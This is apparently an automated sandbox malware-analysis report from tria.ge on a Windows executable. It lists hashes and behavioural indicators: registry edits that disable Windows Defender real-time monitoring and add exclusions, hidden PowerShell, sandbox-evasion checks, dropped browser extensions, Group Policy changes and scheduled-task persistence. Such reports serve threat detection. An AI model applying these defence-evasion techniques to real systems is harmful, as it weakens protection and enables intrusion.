Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
226s -
max time network
229s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
04/07/2024, 22:36
Static task
static1
Behavioral task
behavioral1
Sample
57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe
Resource
win7-20240508-en
General
-
Target
57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe
-
Size
7.2MB
-
MD5
996233a65fee55d8bce4b872e4c117e1
-
SHA1
95e894cb95f14cf1438e9b8d75a7594dcdaaf4e3
-
SHA256
57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d
-
SHA512
d832f158cdab5dc47776d336521942f548259cb6976f0e6bcafa67b6cc221fca58b438fad5829978fe4c97850c64477f953653b8421ed9267734a2352e538d7e
-
SSDEEP
196608:91OZfn3rm11qJ2sIwxXzRCSQwmWtT7GkZbi0IFZU7P:3OZfn3Cy2pwmwT6kREUb
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATiuMetuMWHU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UyPATDbiwjgOC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VcCVDDBRU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATiuMetuMWHU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IchmcMfQaXUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UyPATDbiwjgOC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NonltQQlyMoZtVVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VcCVDDBRU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IchmcMfQaXUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NonltQQlyMoZtVVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 2340 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 2036 powershell.exe 2068 powershell.exe 2788 powershell.exe 2256 powershell.EXE 1376 powershell.EXE 1688 powershell.exe 2084 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Control Panel\International\Geo\Nation JyKDiOp.exe -
Executes dropped EXE 4 IoCs
pid Process 3004 Install.exe 2144 Install.exe 2472 tgOgpoU.exe 2228 JyKDiOp.exe -
Loads dropped DLL 23 IoCs
pid Process 2848 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe 3004 Install.exe 3004 Install.exe 3004 Install.exe 3004 Install.exe 2144 Install.exe 2144 Install.exe 2144 Install.exe 2116 WerFault.exe 2116 WerFault.exe 2116 WerFault.exe 2340 rundll32.exe 2340 rundll32.exe 2340 rundll32.exe 2340 rundll32.exe 316 WerFault.exe 316 WerFault.exe 316 WerFault.exe 316 WerFault.exe 316 WerFault.exe 1284 WerFault.exe 1284 WerFault.exe 1284 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json JyKDiOp.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json JyKDiOp.exe -
Drops file in System32 directory 24 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini tgOgpoU.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat JyKDiOp.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol tgOgpoU.exe File created C:\Windows\system32\GroupPolicy\gpt.ini tgOgpoU.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JyKDiOp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 JyKDiOp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 JyKDiOp.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 JyKDiOp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 JyKDiOp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 JyKDiOp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 JyKDiOp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 JyKDiOp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JyKDiOp.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol JyKDiOp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 JyKDiOp.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol tgOgpoU.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi JyKDiOp.exe File created C:\Program Files (x86)\VcCVDDBRU\VVBajwS.xml JyKDiOp.exe File created C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\KyHeSQO.dll JyKDiOp.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi JyKDiOp.exe File created C:\Program Files (x86)\ATiuMetuMWHU2\SunBWXR.xml JyKDiOp.exe File created C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\jaKjrah.xml JyKDiOp.exe File created C:\Program Files (x86)\UyPATDbiwjgOC\blIehCe.xml JyKDiOp.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak JyKDiOp.exe File created C:\Program Files (x86)\ATiuMetuMWHU2\hDmySLvUUGMVf.dll JyKDiOp.exe File created C:\Program Files (x86)\VcCVDDBRU\DyLUGV.dll JyKDiOp.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja JyKDiOp.exe File created C:\Program Files (x86)\UyPATDbiwjgOC\yRrrnvz.dll JyKDiOp.exe File created C:\Program Files (x86)\IchmcMfQaXUn\tklAOFS.dll JyKDiOp.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bmQWCxleEgxbTUrSZz.job schtasks.exe File created C:\Windows\Tasks\nsbPTSdSgPuDRRbhc.job schtasks.exe File created C:\Windows\Tasks\RShenKKeUbJzTjI.job schtasks.exe File created C:\Windows\Tasks\ROHimGgVjIIdgMKwK.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2116 2472 WerFault.exe 41 316 2144 WerFault.exe 29 1284 2228 WerFault.exe 185 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" tgOgpoU.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached tgOgpoU.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 JyKDiOp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\32-ee-0b-4f-68-e6 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" JyKDiOp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0099000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 JyKDiOp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecisionReason = "1" JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadNetworkName = "Network 3" JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6 JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecision = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadDecision = "0" JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates JyKDiOp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ JyKDiOp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadDecisionReason = "1" JyKDiOp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs JyKDiOp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadDecisionTime = e09ec3fa62ceda01 JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs JyKDiOp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 JyKDiOp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecisionTime = e09ec3fa62ceda01 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDetectedUrl rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80b687e862ceda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs JyKDiOp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings JyKDiOp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecisionTime = e09ec3fa62ceda01 JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs JyKDiOp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates JyKDiOp.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2836 schtasks.exe 2520 schtasks.exe 2808 schtasks.exe 2872 schtasks.exe 1412 schtasks.exe 1284 schtasks.exe 2608 schtasks.exe 2568 schtasks.exe 2708 schtasks.exe 2200 schtasks.exe 2600 schtasks.exe 1516 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 2788 powershell.exe 2256 powershell.EXE 2256 powershell.EXE 2256 powershell.EXE 1376 powershell.EXE 1376 powershell.EXE 1376 powershell.EXE 1688 powershell.exe 2084 powershell.EXE 2084 powershell.EXE 2084 powershell.EXE 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2036 powershell.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2068 powershell.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe 2228 JyKDiOp.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2788 powershell.exe Token: SeIncreaseQuotaPrivilege 2756 WMIC.exe Token: SeSecurityPrivilege 2756 WMIC.exe Token: SeTakeOwnershipPrivilege 2756 WMIC.exe Token: SeLoadDriverPrivilege 2756 WMIC.exe Token: SeSystemProfilePrivilege 2756 WMIC.exe Token: SeSystemtimePrivilege 2756 WMIC.exe Token: SeProfSingleProcessPrivilege 2756 WMIC.exe Token: SeIncBasePriorityPrivilege 2756 WMIC.exe Token: SeCreatePagefilePrivilege 2756 WMIC.exe Token: SeBackupPrivilege 2756 WMIC.exe Token: SeRestorePrivilege 2756 WMIC.exe Token: SeShutdownPrivilege 2756 WMIC.exe Token: SeDebugPrivilege 2756 WMIC.exe Token: SeSystemEnvironmentPrivilege 2756 WMIC.exe Token: SeRemoteShutdownPrivilege 2756 WMIC.exe Token: SeUndockPrivilege 2756 WMIC.exe Token: SeManageVolumePrivilege 2756 WMIC.exe Token: 33 2756 WMIC.exe Token: 34 2756 WMIC.exe Token: 35 2756 WMIC.exe Token: SeDebugPrivilege 2256 powershell.EXE Token: SeDebugPrivilege 1376 powershell.EXE Token: SeDebugPrivilege 1688 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2136 WMIC.exe Token: SeIncreaseQuotaPrivilege 2136 WMIC.exe Token: SeSecurityPrivilege 2136 WMIC.exe Token: SeTakeOwnershipPrivilege 2136 WMIC.exe Token: SeLoadDriverPrivilege 2136 WMIC.exe Token: SeSystemtimePrivilege 2136 WMIC.exe Token: SeBackupPrivilege 2136 WMIC.exe Token: SeRestorePrivilege 2136 WMIC.exe Token: SeShutdownPrivilege 2136 WMIC.exe Token: SeSystemEnvironmentPrivilege 2136 WMIC.exe Token: SeUndockPrivilege 2136 WMIC.exe Token: SeManageVolumePrivilege 2136 WMIC.exe Token: SeDebugPrivilege 2084 powershell.EXE Token: SeDebugPrivilege 2036 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1320 WMIC.exe Token: SeIncreaseQuotaPrivilege 1320 WMIC.exe Token: SeSecurityPrivilege 1320 WMIC.exe Token: SeTakeOwnershipPrivilege 1320 WMIC.exe Token: SeLoadDriverPrivilege 1320 WMIC.exe Token: SeSystemtimePrivilege 1320 WMIC.exe Token: SeBackupPrivilege 1320 WMIC.exe Token: SeRestorePrivilege 1320 WMIC.exe Token: SeShutdownPrivilege 1320 WMIC.exe Token: SeSystemEnvironmentPrivilege 1320 WMIC.exe Token: SeUndockPrivilege 1320 